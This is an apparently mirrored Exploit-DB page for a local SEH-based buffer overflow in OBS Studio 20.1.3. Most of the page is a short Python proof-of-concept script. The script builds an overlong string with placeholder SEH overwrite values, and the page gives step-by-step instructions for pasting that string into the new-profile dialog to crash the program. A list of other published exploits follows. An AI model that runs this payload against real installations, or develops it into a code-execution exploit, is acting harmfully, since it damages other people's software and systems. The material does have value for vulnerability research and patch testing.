OBS Studio 20.1.3 – Local Buffer Overflow

Exploit Database
16 阅读

作者： ScrR1pTK1dd13

日期： 2018-01-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/43596/

author = '''
 
##############################################
#Created: ScrR1pTK1dd13#
#Name: Greg Priest #
#Mail: ScR1pTK1dd13.slammer@gmail.com# 
##############################################
 
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download

'''

bug = '''
Vulnerable input field:
<1> Copy printed "AAAAA...." string to clipboard!
<2> Profile -> New
<3> Paste the string in the input then press Ok

'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533

print author
print "String: ", junk + SEH + nextSEH + overflow
print bug

last Exploits
OBS Studio 20.1.3 – Local Buffer Overflow的更多信息

FTPShell Client 6.53 – ‘Session name’ Local Buffer Overflow：
Adobe Flash – Overflow in Slab Rendering：
OpenSSL – ‘ssl3_get_key_exchange()’ Use-After-Free Memory Corruption：
PHP 5.4.3 – PDO Memory Access Violation Denial of Service：
Google Chrome < 31.0.1650.48 - HTTP 1xx base::StringTokenizerT<...>::QuickGetNext Out-of-Bounds Read：
Ingres Database 9.3 – Heap Buffer Overflow：
Adobe Acrobat and Reader – Array Indexing Remote Code Execution：
SpotAuditor 5.3.4 – ‘Name’ Denial of Service (PoC)：